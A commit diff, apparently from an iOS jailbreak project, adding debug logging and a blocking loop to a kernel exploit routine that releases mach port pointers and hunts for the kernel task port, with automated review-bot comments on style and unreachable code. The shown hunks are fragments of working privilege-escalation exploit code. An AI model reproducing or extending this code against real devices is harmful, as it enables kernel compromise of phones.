-rw-r--r--.gitignore4
-rwxr-xr-xsrc/stage4/kexp/exploit.js17
-rw-r--r--src/stage4/main.js14
3 files changed, 32 insertions, 3 deletions
diff --git a/.gitignore b/.gitignore
index 6956cbd..4e09967 100644
--- a/.gitignore
+++ b/.gitignore
@@ -18,4 +18,6 @@ racoon.conf
.vscode
exp_unmin.js
-stage4.js \ No newline at end of file
+stage4.js
+
+.irecovery \ No newline at end of file
diff --git a/src/stage4/kexp/exploit.js b/src/stage4/kexp/exploit.js
index aa10126..19d2623 100755
--- a/src/stage4/kexp/exploit.js
+++ b/src/stage4/kexp/exploit.js
@@ -289,13 +289,19 @@ function send_ports(target, payload, num, number_port_descs) {
function release_port_ptrs(port) {
// var req = shit_heap(0x1c + (5 * 0xc) + 0x8);
+ p0laris_log("fuck");
var req = shit_heap(0x1c + (5 * 0xc) + 0x8);
-// p0laris_log("%s\n", hexdump(read_buf(req, 0x1c + (5 * 0xc) + 0x8), 8, 2, req, 8, "0"));
+ p0laris_log("fuck");
+ // p0laris_log("%s\n", hexdump(read_buf(req, 0x1c + (5 * 0xc) + 0x8), 8, 2, req, 8, "0"));
var ret = mach_msg(req, MACH_RCV_MSG, 0, (0x1c + (5 * 0xc) + 0x8), port, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
+ p0laris_log("fuck");
if (ret != KERN_SUCCESS) {
p0laris_log("mach_recv %d %s\n", ret, mach_error_string(ret));
+ p0laris_log("fuck2");
}
+ p0laris_log("fuck");
shit_heap_free(req);
+ p0laris_log("fuck");
}
function r3gister(task, init_port_set, real_count, fake_count) {
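Review bot: The five new `p0laris_log("fuck")` calls carry no newline and are byte-identical, so the log cannot tell which step of release_port_ptrs was reached, which defeats the purpose of adding them; every other p0laris_log in the file ends with `\n` and names what it reports. If the tracing is meant to stay, make each line distinct, e.g. `p0laris_log("release_port_ptrs: mach_msg ret=%d\n", ret);` after the receive, and drop the rest. Separately, a failed `mach_msg` is logged at L36 but the function still frees the request and returns nothing, so the caller loop (next hunk) cannot tell a port whose pointers were released from one that was not; returning `ret` after `shit_heap_free(req)` and checking it at the call site would make the failure visible. The helper is complete inside this hunk; r3gister is not.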
@@ -463,6 +469,9 @@ again: while (true) {
sched_yield();
for (var i = 0; i < PORTS_NUM; i++) {
// for (var i = 0; i < 8; i++) {
+ if (i % 4 == 0) {
+ p0laris_log("release_port_ptrs %d\n", i);
+ }
release_port_ptrs(read_u32(fp + (i << 2)));
}
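Review bot: The progress guard uses loose equality, `if (i % 4 == 0)`, while the rest of this commit's new code compares with `===` (the kernel_task check later in this file); keeping one style avoids a reviewer wondering whether coercion is intended. `i` is a loop counter, so `i % 4 === 0` is a drop-in replacement. The `again:` loop this hunk sits in starts and ends outside the hunk.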
@@ -544,7 +553,7 @@ again: while (true) {
p0laris_log("IF YOU SEE THIS AND IT LOOKS LEGIT, SHIT HAS FUCKING HAPPENED\n");
p0laris_log("fuck\n");
call4arg(sym_cache["puts"], sptr("kernel_task address: 0x" + pad_left(read_u32(kernel_task_addr).toString(16), '0', 8)), 0, 0, 0);
- if (kernel_task_addr === 0xffffffff) {
+ if (read_u32(kernel_task_addr) === 0xffffffff) {
continue again;
}
p0laris_log("kernel_task address: 0x%08x\n", read_u32(kernel_task_addr));
@@ -552,6 +561,10 @@ again: while (true) {
p0laris_log("get lucky\n");
+ while (true) {
+ sleep(3600);
+ }
+
return tfp0;
}
}
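Review bot: The added `while (true) { sleep(3600); }` immediately before `return tfp0;` makes the return unreachable, so get_kernel_task never hands the task port back to main() and the `__p0laris_LOG_END__` syslog in main.js will never be emitted. If this is a deliberate "park the process so it can be inspected" hack, mark it as such so it does not ship by accident, e.g. `// DEBUG: hold the process for inspection; remove before release` above the loop; if it is not, delete the loop. The function's head and the `again:` loop it sits in are outside this hunk.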
diff --git a/src/stage4/main.js b/src/stage4/main.js
index 53a74ec..af2ed69 100644
--- a/src/stage4/main.js
+++ b/src/stage4/main.js
@@ -12,6 +12,13 @@ var SOCK_DGRAM = 2;
var SOCK_DGRAM = 2;
var IPPROTO_UDP = 17;
+function prep_shit() {
+ string_ref = scall("JSStringCreateWithUTF8CString", "victim");
+ global_object = scall("JSContextGetGlobalObject", read_u32(slid + reserve_addr + 0x44));
+ jsobj_addr = scall("JSObjectGetProperty", read_u32(slid + reserve_addr + 0x44), global_object, string_ref, NULL);
+ large_buf_ptr = leak_vec(large_buf);
+}
+
function main() {
syslog(LOG_SYSLOG, "__p0laris_LOG_START__");
p0laris_log("[*] we out here");
@@ -24,6 +31,13 @@ function main() {
printf("test");
+ var dyld_shc_slide = get_dyld_shc_slide();
+
+ sym_cache["JSStringCreateWithUTF8CString"] = JSStringCreateWithUTF8CString + dyld_shc_slide;
+ sym_cache["JSObjectGetProperty"] = JSObjectGetProperty + dyld_shc_slide;
+ sym_cache["JSContextGetGlobalObject"] = JSContextGetGlobalObject + dyld_shc_slide;
+ prep_shit();
+
var tfp0 = get_kernel_task();
syslog(LOG_SYSLOG, "__p0laris_LOG_END__");